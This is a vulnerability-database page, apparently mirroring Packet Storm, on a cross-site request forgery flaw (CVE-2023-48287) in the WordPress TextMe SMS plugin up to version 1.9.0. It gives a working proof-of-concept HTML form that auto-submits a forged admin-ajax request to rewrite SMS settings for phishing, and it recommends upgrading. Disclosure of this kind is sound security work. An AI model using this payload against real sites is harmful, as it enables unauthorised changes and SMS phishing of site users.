Lucene search
+L

WordPress TextMe SMS 1.9.0 Cross Site Request Forgery

🗓️ 11 Dec 2023 00:00:00Reported by ArvandyType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 332 Views

WordPress TextMe SMS 1.9.0 Cross Site Request Forgery vulnerability in Account Details and Contact Form 7 Event

Related
Code
ReporterTitlePublishedViews
Family
zdt
zdt
WordPress TextMe SMS 1.9.0 Cross Site Request Forgery Vulnerability
12 Dec 202300:00
zdt
circl
Circl
CVE-2023-48287
9 Dec 202412:01
circl
cnnvd
CNNVD
WordPress plugin TextMe SMS 安全漏洞
9 Dec 202400:00
cnnvd
cve
CVE
CVE-2023-48287
9 Dec 202411:30
cve
cvelist
Cvelist
CVE-2023-48287 WordPress TextMe SMS plugin <= 1.9.0 - Broken Access Control vulnerability
9 Dec 202411:30
cvelist
euvd
EUVD
EUVD-2023-52354
3 Oct 202520:07
euvd
nvd
NVD
CVE-2023-48287
9 Dec 202413:15
nvd
patchstack
Patchstack
WordPress TextMe SMS Plugin <= 1.9.0 is vulnerable to Broken Access Control
23 Nov 202300:00
patchstack
ptsecurity
Positive Technologies
PT-2024-13575 · Unknown · Textme Sms
9 Dec 202400:00
ptsecurity
redhatcve
RedhatCVE
CVE-2023-48287
23 May 202502:10
redhatcve
Rows per page
`# Exploit Title: WP Plugins TextMe SMS <= 1.9.0 - CSRF  
# Date: 09-12-2023  
# Exploit Author: Arvandy  
# Software Link: https://wordpress.org/plugins/textme-sms-integration/  
# Version: 1.9.0  
# Tested on: Windows, Linux  
# CVE: CVE-2023-48287  
  
# Product Description  
This plugin allows you to send SMS messages from your WordPress dashboard to the site owner or to your end users.  
  
# Vulnerability overview  
The Wordpress plugins TextMe SMS <= 1.9.0 is vulnerable to Cross-Site Request Forgery in the Settings function (Account details and Contact Form 7 Events). This could allow unauthenticated users to trick authenticated users to unintentionally modify the account details and contact form 7 events. This could lead to sensitive data leakage as well as phishing attacks.   
  
# Proof of Concept  
<html>  
<body>  
<form action="http://x.x.x.x/WP/wp-admin/admin-ajax.php" method="POST">  
<input type="hidden" name="action" value="tetxme_update_option_page" />  
<input type="hidden" name="data" value="textme_cf7=1&textme_cf7_user=1&textme_cf7_phone_field=0123456789&textme_cf7_user_content=SMS%20Phishing%20Sample" />  
<input type="submit" value="Submit request" />  
</form>  
<script>  
history.pushState('', '', '/');  
document.forms[0].submit();  
</script>  
</body>  
</html>  
  
  
# Recommendation  
Upgrade to version 1.9.1  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation